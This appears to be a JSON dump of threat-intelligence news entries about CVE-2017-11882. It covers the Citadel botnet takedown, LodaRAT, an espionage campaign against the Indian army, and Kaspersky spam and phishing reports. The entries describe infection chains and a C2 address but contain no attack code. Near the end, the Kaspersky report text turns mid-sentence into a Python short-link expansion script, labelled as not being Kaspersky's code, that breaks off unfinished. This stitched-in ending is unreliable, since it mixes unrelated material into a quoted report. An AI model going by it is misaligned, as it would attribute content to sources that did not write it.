day for everyone involved,\u201d Peterson said, \u201cIt\u2019s certainly a day when everyone on the internet is safer than they were yesterday and that doesn\u2019t happen very often.\u201d\n\nThe Citadel Trojan has been spotted mining all types of financial information, including banking logins and passwords since [being introduced a year and a half ago](<http://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>). 
To date it\u2019s believed the botnet is responsible for more than half a billion dollars in financial loss.\n\nPeddled primarily on a handful of underground forums as a variant of the Zeus Trojan, the malware has long been cloaked in secrecy. Owners insist on distributing their kit among trusted insiders, [hoping to keep law enforcement out and support costs down](<http://threatpost.com/citadel-trojan-updates-dynamic-config-mechanism-streamlines-fraud-activity-101812/>).\n\nMicrosoft has taken a hard line on cybercrime over the last several years, and much of that is due to [the work being done by its Digital Crimes Unit](<http://threatpost.com/at-microsoft-a-sharpened-focus-on-cybercrime/>). The DCU, a collection of Microsoft engineers, security experts and lawyers, has proved successful at shutting down botnets that are largely dependent on a centralized infrastructure, including Kelihos, Zeus, Waledac and Rustock.\n\nIn [a discussion with Threatpost\u2019s Dennis Fisher last month](<http://threatpost.com/qa-microsofts-tj-campana/>), T.J. Campana, the DCU\u2019s Director of Security, claimed the group tries to take a transparent approach with their takedowns.\n\n\u201cWe\u2019re not just going out there shooting stuff. We walk in with a pile of legal documents.
We\u2019re asking for a judge to agree with what we found,\u201d Campana said of the group\u2019s actions at the time.\n", "modified": "2013-06-10T19:43:44", "published": "2013-06-06T13:38:55", "id": "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "href": "https://threatpost.com/microsoft-authorities-disrupt-hundreds-of-citadel-botnets-with-operation-b54/100902/", "type": "threatpost", "title": "Operation b54 Knocks 1,000+ Citadel Botnets Offline", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2021-02-15T13:26:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://thehackernews.com/images/-tqjnoGRTR9g/YCPLcDyCPJI/AAAAAAAABus/hbBSlGtymgQZUdyWVYb21EOjH9vHgiyCwCLcBGAsYHQ/s0/android-hacking.jpg>)\n\nA previously known Windows remote access Trojan (RAT) with credential-stealing capabilities has now expanded its scope to set its sights on users of Android devices to further the attacker's espionage motives.\n\n\"The developers of [LodaRAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.loda>) have added Android as a targeted platform,\" Cisco Talos researchers [said](<https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html>) in a Tuesday analysis. 
\"A new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities.\"\n\nKasablanca, the group behind the malware, is said to have deployed the new RAT in an ongoing hybrid campaign targeting Bangladeshi users, the researchers noted.\n\nThe reason why Bangladesh-based organizations have been specifically singled out for this campaign remains unclear, as is the identity of the threat actor.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\nFirst documented in May 2017 by [Proofpoint](<https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware>), Loda is an AutoIt malware typically delivered via phishing lures that's equipped to run a wide range of commands designed to record audio, video, and capture other sensitive information, with [recent](<https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html>) [variants](<https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html>) aimed at stealing passwords and cookies from browsers.\n\n[](<https://thehackernews.com/images/--8RMWrAwLfY/YCPKSh6P1SI/AAAAAAAABuY/7lRzGVnRVa0dHBhokPWNpXI-TtuC9YH8QCLcBGAsYHQ/s0/android-malware-permissions.jpg>)\n\nThe latest versions \u2014 dubbed Loda4Android and Loda4Windows \u2014 are a lot alike in that they come with a full set of data-gathering features that constitute a stalker application. 
However, the Android malware is also different, as it particularly avoids techniques often used by banking Trojans, like [abusing Accessibility APIs](<https://thehackernews.com/2021/01/italy-cert-warns-of-new-credential.html>) to record on-screen activities.\n\nBesides sharing the same command-and-control (C2) infrastructure for both Android and Windows, the attacks, which originated in October 2020, have targeted banks and carrier-grade voice-over-IP software vendors, with clues pointing to the malware author being based in Morocco.\n\nThe attackers also made use of a myriad of social engineering tricks, ranging from typosquatted domains to malicious RTF documents embedded in emails, that, when opened, triggered an infection chain that leverages a memory corruption vulnerability in Microsoft Office (CVE-2017-11882) to download the final payload.\n\n[](<https://thehackernews.com/images/-ICoOr9MEQO8/YCPKhqqDnPI/AAAAAAAABuc/omP3BWsDN5YFLSUMMZQgBowmX2eyD6GUwCLcBGAsYHQ/s0/android-malware.jpg>)\n\nWhile the Android version of the malware can take photos and screenshots, read SMS and call logs, send SMS and perform calls to specific numbers, and intercept SMS messages or phone calls, its latest Windows counterpart comes with new commands that enable remote access to the target machine via Remote Desktop Protocol (RDP) and a \"Sound\" command that makes use of the [BASS](<https://www.un4seen.com/bass.html>) audio library to capture audio from a connected microphone.\n\n\"The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,\" said researchers with Cisco Talos.\n\n\"Along with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities.
As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.\"\n", "modified": "2021-02-15T11:57:41", "published": "2021-02-10T12:18:00", "id": "THN:DADA9CB340C28F942D085928B22B103F", "href": "https://thehackernews.com/2021/02/lodarat-windows-malware-now-also.html", "type": "thn", "title": "LodaRAT Windows Malware Now Also Targets Android Devices", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T16:10:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://thehackernews.com/images/-moq29tjLKes/X3Hiw_j-BWI/AAAAAAAAAzw/G5NSZ76jyIEmHTHx-X2e_kV6iO-wPmGkwCLcBGAsYHQ/s728/indian-army-virus.jpg>)\n\nCybersecurity researchers uncovered fresh evidence of an ongoing cyberespionage campaign against Indian defense units and armed forces personnel at least since 2019 with an aim to steal sensitive information.\n\nDubbed \"**Operation SideCopy**\" by Indian cybersecurity firm [Quick Heal](<https://www.seqrite.com/blog/operation-sidecopy/>), the attacks have been attributed to an advanced persistent threat (APT) group that has successfully managed to stay under the radar by \"copying\" the tactics of other threat actors such as the [SideWinder](<https://thehackernews.com/2020/01/android-zero-day-malware-apps.html>).\n\n### Exploiting Microsoft Equation Editor Flaw\n\nThe campaign's starting point is an email with an embedded malicious attachment \u2014 either in the form of a ZIP file containing an LNK file or a Microsoft Word document \u2014 that triggers an infection chain via a series of steps to download the final-stage
payload.\n\nAside from identifying three different infection chains, what's notable is the fact that one of them exploited template injection and the Microsoft Equation Editor flaw ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), a 20-year-old memory corruption issue in Microsoft Office that, when exploited successfully, lets attackers execute remote code on a vulnerable machine even without user interaction.\n\nMicrosoft addressed the issue in a patch released in [November 2017](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>).\n\n[](<https://thehackernews.com/images/-yeksQpFeoGU/X3Hjgm_8XwI/AAAAAAAAAz8/8voJD0WmwyEW3F9S0LX6UK_qAEruSqQCgCLcBGAsYHQ/s0/indian-army.jpg>)\n\nAs is often the case with such malspam campaigns, the attack relies on a bit of social engineering to bait the user into opening a seemingly realistic Word document that claims to be about the Indian government's defense production policy.\n\nWhat's more, the LNK files have a double extension (\"Defence-Production-Policy-2020.docx.lnk\") and come with document icons, thereby tricking an unsuspecting victim into opening the file.\n\nOnce opened, the LNK files abuse \"[mshta.exe](<https://attack.mitre.org/techniques/T1218/005/>)\" to execute malicious HTA (short for Microsoft HTML Applications) files that are hosted on fraudulent websites, with the HTA files created using an open-source payload generation tool called [CACTUSTORCH](<https://github.com/mdsecactivebreach/CACTUSTORCH>).\n\n### A Multi-stage Malware Delivery Process\n\nThe first-stage HTA file includes a decoy document and a malicious .NET module that executes the said document and downloads a second-stage HTA file, which in turn checks for the presence of popular antivirus solutions before copying Microsoft's credential backup and restore utility (\"credwiz.exe\") to a different folder on the victim machine and
modifying the registry to run the copied executable at every startup.\n\nConsequently, when this file gets executed, not only does it side-load a malicious \"DUser.dll\" file, it also launches the RAT module \"winms.exe,\" both of which are obtained from the stage-2 HTA.\n\n\"This DUser.dll will initiate the connection over this IP address '173.212.224.110' over TCP port 6102,\" the researchers said.\n\n\"Once successfully connected, it will [...] then proceed for performing various operations based on the command received from C2. For example, if C2 sends 0, then it collects the Computer Name, Username, OS version etc. and sends it back to C2.\"\n\n[](<https://thehackernews.com/images/-q-0sbc9Cl08/X3HkAhQRMSI/AAAAAAAAA0I/vjEr5t0jwRY3WhXg5V1Pk0S9zCsvH7W6QCLcBGAsYHQ/s0/cyber-attack-vector.jpg>)\n\nStating that the RAT shared code-level similarities with Allakore Remote, open-source remote-access software written in Delphi, Quick Heal's Seqrite team noted that the Trojan employed Allakore's RFB (remote frame buffer) protocol to exfiltrate data from the infected system.\n\n### Possible Links to Transparent Tribe APT\n\nIn addition, a few attack chains are also said to have dropped a previously unseen .NET-based RAT (called \"Crimson RAT\" by [Kaspersky](<https://securelist.com/transparent-tribe-part-1/98127/>) researchers) that comes equipped with a wide range of capabilities, including accessing files, reading clipboard data, killing processes, and even executing arbitrary commands.\n\nAlthough the modus operandi of naming DLL files shares similarities with the SideWinder group, the APT's heavy reliance on the open-source toolset and an entirely different C2 infrastructure led the researchers to conclude with [reasonable confidence](<https://securelist.com/transparent-tribe-part-2/98233/>) that the threat actor is of Pakistani origin \u2014 specifically the [Transparent Tribe](<https://malpedia.caad.fkie.fraunhofer.de/actor/operation_c-major>) group, which has been recently
linked to several attacks targeting the Indian military and government personnel.\n\n\"Thus, we suspect that the actor behind this operation is a sub-division under (or part of) Transparent-Tribe APT group and are just copying TTPs of other threat actors to mislead the security community,\" Quick Heal said.\n", "modified": "2020-09-30T15:00:45", "published": "2020-09-28T13:27:00", "id": "THN:81AA37DC2B87520CB02F3508EF82AABD", "href": "https://thehackernews.com/2020/09/cyberattack-indian-army.html", "type": "thn", "title": "Researchers Uncover Cyber Espionage Operation Aimed At Indian Army", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-05-06T15:40:20", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Figures of the year\n\n * The share of spam in mail traffic was 56.51%, which is 4.03 p.p. more than in 2018.\n * The biggest source of spam this year was China (21.26%).\n * 44% of spam e-mails were less than 2 KB in size.\n * Malicious spam was detected most commonly with the Exploit.MSOffice.CVE-2017-11882 verdict.\n * The Anti-Phishing system was triggered 467,188,119 times.\n * 17% of unique users encountered phishing.\n\n## Trends of the year\n\n### Beware of novelties\n\nIn 2019, attackers were more active than usual in their exploitation of major sports and movie events to gain access to users' financial or personal data. Premieres of TV shows and films, and sports broadcasts were used as bait for those looking to save money by watching on \"unofficial\" resources.\n\nA search for \"Watch latest X for free\" (where X = _Avengers_ movie, _Game of Thrones_ season, Stanley Cup game, US Open, etc.)
returned links to sites offering the opportunity to do precisely that. On clicking through to these resources, the broadcast really did begin, only to stop after a couple of minutes. To continue viewing, the user was prompted to create a free account (only an e-mail address and password were required). However, when the Continue button was clicked, the site asked for additional confirmation.\n\nAnd not just any old information, but bank card details, including the three-digit security code (CVV) on the reverse side. The site administrators assured that funds would not be debited from the card, and that this data was needed only to confirm the user's location (and hence the right to view the content). However, instead of continuing the broadcast, the scammers simply pocketed the details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150402/sl_spamreport_2019_01.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150400/sl_spamreport_2019_02.png>)\n\nNew gadgets were also deployed as bait. Cybercriminals created fake pages mimicking official Apple services. The number of fake sites rose sharply after the company unveiled its new products. And while Apple was only just preparing to release the next gadget, fraudsters were offering to \"sell\" it to those with itchy hands. All the victim had to do was follow a link and enter their Apple ID credentials \u2014 the attackers' objective.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150358/sl_spamreport_2019_03.png>)\n\n### The price of fame: attackers exploit popular resources\n\nIn 2019, scammers found new ways to exploit popular resources and social networks to spread spam and sell non-existent goods and services.
They actively used YouTube and Instagram comments to place ads and links to potentially malicious pages, and created numerous social media accounts that they promoted by commenting on the posts of popular bloggers.\n\nFor added credibility, they left many fake comments on posts about hot topics. As the account gained a following, it began to post messages about promotions, for example, a sale of branded goods at knock-down prices. Victims either received a cheap imitation or simply lost their cash.\n\nA similar scheme was used to promote get-rich-quick-online videos, coupled with gushing reviews from \"newly flush\" clients.\n\nAnother scam involved fake celebrity Instagram accounts. The \"stars\" asked fans to take a survey and get a cash payout or the chance to participate in a prize draw. Naturally, a small upfront fee was payable for this unmissable opportunity\u2026 After the cybercriminals received the money, the account simply disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_04.png>)\n\nBesides distributing links through comments on social networks, scammers utilized yet another delivery method in the shape of Google services: invitations to meetings sent via Google Calendar or notifications from Google Photos that someone had just shared a picture were accompanied by a comment from the attackers with links to fake promotions, surveys, and prize giveaways.\n\nOther Google services were also used: links to files in Google Drive and Google Storage were sent inside fraudulent e-mails, which spam filters are not always able to spot.
Clicking such a link usually opened a file with adware (for example, fake pharmaceutical products) or another link leading to a phishing site or a form for collecting personal data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_05.png>)\n\nAlthough Google and others are constantly working to protect users from scammers, the latter are forever finding new loopholes. Therefore, the main protection against such schemes is to pay careful attention to messages from unfamiliar senders.\n\n### Malicious transactions\n\nIn Q1, users of the Automated Clearing House (ACH), an electronic funds-transfer system that facilitates payments in the US, fell victim to fraudsters: we registered mailings of fake ACH notifications about the status of a payment or debt. By clicking the link or opening the attachment, the user risked infecting the computer with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150355/sl_spamreport_2019_06.png>)\n\n### Anyone order bitcoin?\n\nCryptocurrency continues to be of interest to scammers.
Alongside the standard fakes of well-known cryptocurrency exchanges, cybercriminals have started creating their own: such resources promise lucrative exchange rates, but steal either personal data or money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150356/sl_spamreport_2019_07.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150354/sl_spamreport_2019_08.png>)\n\n### Cryptocurrencies and blackmail\n\nIf in 2018 cybercriminals tried to blackmail users by claiming to have malware-obtained compromising material on them, in 2019 e-mails began arriving from a CIA agent (the name varied) supposedly dealing with a case opened against the message recipient pertaining to the storage and distribution of pornographic images of minors.\n\nThe case, the e-mail alleged, was part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"agent\" happened to know that the recipient was a well-heeled individual with a reputation to protect, and for $10,000 in bitcoin would be willing to alter or destroy the dossier (all information about the victim used to add credence to the e-mail was harvested in advance from social networks and forums). For someone genuinely afraid of the potential consequences, this would be a small price to pay.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150352/sl_spamreport_2019_09.png>)\n\nLegal entities found themselves in an even more desperate situation when faced with similar threats. However, for them it was not about sextortion, but spamming. The blackmailers sent a message to the company using its public e-mail address or online feedback form in which they demanded a ransom in bitcoin. If refused, the attackers threatened to send millions of spam e-mails in the company's name.
This, the cybercriminals assured, would prompt the Spamhaus Project to recognize the resource as a spammer and block it forever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150350/sl_spamreport_2019_10.png>)\n\n### Corporate sector in the crosshairs\n\nThe growing trend for attacks on the corporate sector is reflected not only in the attempts to cyber-blackmail companies. The reputation of many firms has been compromised by spam mailings through feedback forms. Having previously used such forms to attack the mailboxes of company employees, in 2019 cybercriminals evolved their methods.\n\nAs such, messages about successful registration on a particular website were received by people who had never even heard about it. After finding a security hole in the site, spammers used a script to bypass the CAPTCHA system and mass-register users via the feedback form. In the Username field, the attackers inserted message text or a link. As a result, the victim whose mailing address was used received a registration confirmation e-mail from a legitimate sender, but containing a message from the scammers. Moreover, the company itself had no idea that this was going on.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150350/sl_spamreport_2019_11.png>)\n\nA far more serious threat came from mailings masked as automatic notifications from services used to compile legitimate mailing lists: the scammers' messages were carefully disguised as notifications about new voice messages (some business products have a feature for exchanging voice messages) or about incoming e-mails stuck in the delivery queue. To access them, the employee had to go through an authentication process, whereupon the corporate account credentials ended up in the hands of the attackers.\n\nScammers devised new methods to coax confidential data out of unsuspecting company employees.
For example, by sending e-mails requesting urgent confirmation of corporate account details or payment information with a link conveniently supplied. If the user swallowed the bait, the authentication data for their account went straight to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150349/sl_spamreport_2019_12.png>)\n\nAnother attack aimed at the corporate sector employed a more complex scheme: the attackers tried to dupe e-mail recipients into thinking that the company management was offering a pay rise in exchange for taking a performance review.\n\nThe message appeared to come from HR and contained detailed instructions and a link to a bogus appraisal form. But before going through the procedure, the recipient had to enter a few details (in most cases it was specified that the e-mail address had to be a corporate one). After clicking the Sign in or Appraisal button, the entered credentials were duly forwarded to the attackers, granting them access to business correspondence, personal data, and probably confidential information too, which could later be used for blackmail or sold to competitors.\n\nA simpler scheme involved sending phishing e-mails supposedly from services used by the company. The most common were fake notifications from HR recruiting platforms.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150348/sl_spamreport_2019_13.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\nThe share of spam in mail traffic in 2019 increased by 4.03 p.p. 
to 56.51%.\n\n_Proportion of spam in global mail traffic, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150545/sl_spamreport_2019_charts_01-en-spam-report-2019-diagramme-und-bilder.png>)_\n\nThe lowest figure was recorded in September (54.68%), and the highest in May (58.71%).\n\n### Sources of spam by country\n\nIn 2019, as in the year before, China retained its crown as the top spam-originating country. Its share grew significantly from the previous year (up 9.57 p.p.) to 21.26%. It remains ahead of the US (14.39%), whose share increased by 5.35 p.p. In third place was Russia (5.21%).\n\nFourth position went to Brazil (5.02%), despite shedding 1.07 p.p. Fifth place in 2019 was claimed by France (3.00%), and sixth by India (2.84%), which ranked the same as the year before. Vietnam (2.62%), fourth in the previous reporting period, moved down to seventh.\n\nThe TOP 10 is rounded out by Germany, dropping from third to eighth (2.61%, down by 4.56 p.p.), Turkey (2.15%), and Singapore (1.72%).\n\n_Sources of spam by country, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150348/sl_spamreport_2019_charts_02_ransomware-geo.png>)_\n\n### Spam e-mail size\n\nIn 2019, the share of very small e-mails continued to grow, but less dramatically than the year before \u2014 by just 4.29 p.p. to 78.44%. Meanwhile, the share of e-mails sized 2\u20135 KB decreased against 2018 by 4.22 p.p. to 6.42%.\n\n_Spam e-mails by size, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_03-spam-report-2019-diagramme-und-bilder.png>)_\n\nThe share of larger e-mails (10\u201320 KB) changed insignificantly, down by 0.84 p.p. 
But there was more junk mail sized 20\u201350 KB: such messages accounted for 4.50% (+1.68 p.p.). In addition, the number of 50\u2013100 KB sized e-mails rose by almost 1 p.p., amounting to 1.81%.\n\n### Malicious mail attachments\n\n#### Malware families\n\n_Number of Mail Anti-Virus triggerings, 2019 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/06134200/07-en-indiana-jones-and-the-lost-chart.png>))_\n\nIn 2019, our security solutions detected a total of 186 005 096 malicious e-mail attachments. November was the most active month with 19 million Mail Anti-Virus triggerings, while December was the \"calmest\" \u2014 with 7 million fewer.\n\n_TOP 10 malware families, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_04-spam-report-2019-diagramme-und-bilder.png>)_\n\nIn 2019, like the year before it, **Exploit.Win32.CVE-2017-11882** malicious objects were the most commonly encountered malware (7.24%). They exploited a vulnerability in Microsoft Office that allowed arbitrary code to be executed without the user's knowledge.\n\nIn second place is the **Trojan.MSOffice.SAgent** family (3.59%), whose members also attack Microsoft Office users. This type of malware consists of a document with a built-in VBA script that secretly loads other malware using PowerShell when the document is opened.\n\nThe **Worm.Win32.WBVB** family (3.11%), which includes executable files written in Visual Basic 6 and classed as untrusted by KSN, rose from fourth place in the rating to third.\n\n**Backdoor.Win32.Androm.gen** (1.64%), which ranked second in the previous reporting period, dropped to fourth position. This modular backdoor is most often used to download malware onto the victim's machine.\n\nFifth place in 2019 was taken by the **Trojan.Win32.Kryptik** family (1.53%).
This verdict is assigned to Trojans that use anti-emulation, anti-debugging, and code obfuscation to make them difficult to analyze.\n\n**Trojan.MSIL.Crypt.gen** (1.26%) took sixth place, while **Trojan.PDF.Badur** (1.14%) \u2014 a PDF that directs the user to a potentially dangerous site \u2014 climbed to seventh.\n\nEighth position fell to another malicious DOC/DOCX document with a malicious VBA script inside \u2014 **Trojan-Downloader.MSOffice.SLoad.gen** (1.14%), which, when opened, may download ransomware onto the victim's computer.\n\nIn ninth place is **Backdoor.Win32.Androm**, and propping up the table is **Trojan.Win32.Agent** (0.92%).\n\n \n\n### Countries targeted by malicious mailings\n\nAs in the previous year, Germany took first place in 2019. Its share remained virtually unchanged: 11.86% of all attacks (+0.35 p.p.). Second place was claimed jointly by Russia and Vietnam (5.77% each) \u2014 Russia held this position in the previous reporting period, while Vietnam's rise to the TOP 3 came from sixth position.\n\n_Countries targeted by malicious mailings, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150341/sl_spamreport_2019_charts_05_en-ransomware-geo.png>)_\n\nLagging behind by just 0.2 p.p. is Italy (5.57%), while the UAE is in fifth place (4.74%), Brazil in sixth (3.88%), and Spain in seventh (3.45%). The TOP 10 is rounded out by the practically neck-and-neck India (2.67%), Mexico (2.63%), and Malaysia (2.39%).\n\n## Statistics: phishing\n\nIn 2019, the Anti-Phishing system was triggered **467 188 119** times on Kaspersky user computers as a result of phishing redirection attempts (15,277,092 fewer than in 2018). In total, 15.17% of our users were attacked.\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. 
This component detects all instances when the user tries to follow a link in an e-mail or on the Internet to a phishing page in cases when such a link has yet to be added to Kaspersky's databases._\n\n#### Rating of categories of organizations attacked by phishers\n\nIn contrast to 2018, in this reporting period the largest share of heuristic component triggers fell to the Banks category. Its share increased by 5.46 p.p. to 27.16%. Last year's leader, the Global Internet Portals category, moved down a rung to second. Against last year, its share decreased by 3.60 p.p. (21.12%). The Payment Systems category remained in third place, its share in 2019 amounting to 16.67% (-2.65 p.p.).\n\n_Distribution of organizations subject to phishing attacks by category, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150331/sl_spamreport_2019_charts_06-en-spam-report-2019-diagramme-und-bilder.png>)_\n\n### Attack geography\n\n#### Countries by share of attacked users\n\nThis period's leader by percentage of attacked unique users out of the total number of users was Venezuela (31.16%).\n\n_Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country, 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/04/07150332/sl_spamreport_2019_charts_07-en-ransomware-geo.png>)_\n\n#### TOP 10 countries by share of attacked users\n\n**Country** | **%** \n---|--- \nVenezuela | 31.16 \nBrazil | 30.26 \nGreece | 25.96 \nPortugal | 25.63 \nAustralia | 25.24 \nAlgeria | 23.93 \nChile | 23.84 \nR\u00e9union | 23.82 \nEcuador | 23.53 \nFrench Guiana | 22.94 \n \n_TOP 10 countries by share of attacked users_\n\nLast year's leader, Brazil (30.26%), this year found itself in second place, shedding 1.98 p.p. and ceding top spot to Venezuela (31.16%), which moved up from ninth position, gaining 11.27 p.p.
In third place was TOP 10 newcomer Greece (25.96%).\n\n## Wrap-up\n\nTV premieres, high-profile sporting events, and the release of new gadgets were exploited by scammers to steal users' personal data or money.\n\nIn the search for new ways to bypass spam filters, attackers are developing new methods of delivering their messages. This year, they made active use of various Google services, as well as popular social networks (Instagram) and video hosting sites (YouTube).\n\nCybercriminals continue to use the topic of finance in schemes aimed at gaining access to users' personal data, infecting computers with malware, or stealing funds from victims' accounts.\n\nThe main trend of 2019 was the rise in the number of attacks on the corporate sector. Fraudulent schemes previously used to repeatedly attack ordinary users changed direction, adding new intricacies to cybercriminal tactics.", "modified": "2020-04-08T10:00:10", "published": "2020-04-08T10:00:10", "id": "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "href": "https://securelist.com/spam-report-2019/96527/", "type": "securelist", "title": "Spam and phishing in 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-26T11:50:09", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### Don't get burned\n\nBurning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). 
Therefore, half-price fake tickets make for excellent bait.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202244/sl_spam_report_11.png>)\n\nScammers tried to make their website as close as possible to the original \u2014 even the page with the ticket description looked genuine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202316/sl_spam_report_12.png>)\n\nThere were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were \"sold\" without prior registration, and the price was a steal ($225 versus $475).\n\n### Oscar-winning scammers\n\nFebruary 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202400/sl_spam_report_13.png>)\n\nTo promote these sites, Twitter accounts were created \u2014 one for each nominated film.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202431/sl_spam_report_14.png>)\n\nCurious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202503/sl_spam_report_15.png>)\n\nDuring registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202534/sl_spam_report_16.png>)\n\nUsers should be alert to the use of short links in posts on social networks. 
Scammers often use them because it's impossible to see where a shortened URL points without actually following it.\n\nThere are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.\n\n### ID for hire\n\nUS companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202917/sl_spam_report_40.png.jpg>)\n\nInspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was \"yes\" even if the input was gibberish), they were promised compensation \"for the leakage of personal data.\"\n\nTo receive \"compensation,\" the victim's citizenship was of no consequence \u2014 what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people's data to claim compensation popped up obsessively on the page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203248/sl_spam_report_41.jpg>)\n\nTo receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words \"I'am don't have SSN\" (the mistakes are a good indicator of a fake), whereupon they were invited to \"rent\" an SSN for $9. 
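The short-link check described above (finding out where a shortened URL leads before anyone visits it) as an added Python example; it is not Kaspersky's code and describes no specific service. Instead of touching the network, `fetch_location` looks up a constructed redirect table whose hostnames are placeholders; a real deployment would issue a HEAD request with automatic redirect-following disabled and read the Location header, which is exactly what the stand-in models. The verdict logic caps the hop count, spots loops, and compares the landing host against an allow-list.

```python
"""Expand a shortened URL by following HTTP redirects without loading page content.

Added example (not Kaspersky's code). The redirect table is constructed for the demo;
`fetch_location` stands in for a HEAD request that does not follow 3xx responses itself.
"""
from urllib.parse import urlparse

# Constructed redirect table standing in for the network: URL -> Location header.
# All hostnames are placeholders.
FAKE_REDIRECTS = {
    "https://short.example/abc": "https://short2.example/xyz",
    "https://short2.example/xyz": "http://free-movies-placeholder.example/watch",
    "https://short.example/safe": "https://www.example.org/press",
    "https://short.example/loop": "https://short.example/loop2",
    "https://short.example/loop2": "https://short.example/loop",
}

MAX_HOPS = 10


def fetch_location(url):
    """Return the Location header the server would send for `url`, or None if it
    answers with a final (non-redirect) response. Offline stand-in for a HEAD request."""
    return FAKE_REDIRECTS.get(url)


def expand(url, max_hops=MAX_HOPS):
    """Follow the redirect chain from `url`.

    Returns (chain, final_url, broken) where `broken` is True for a redirect loop
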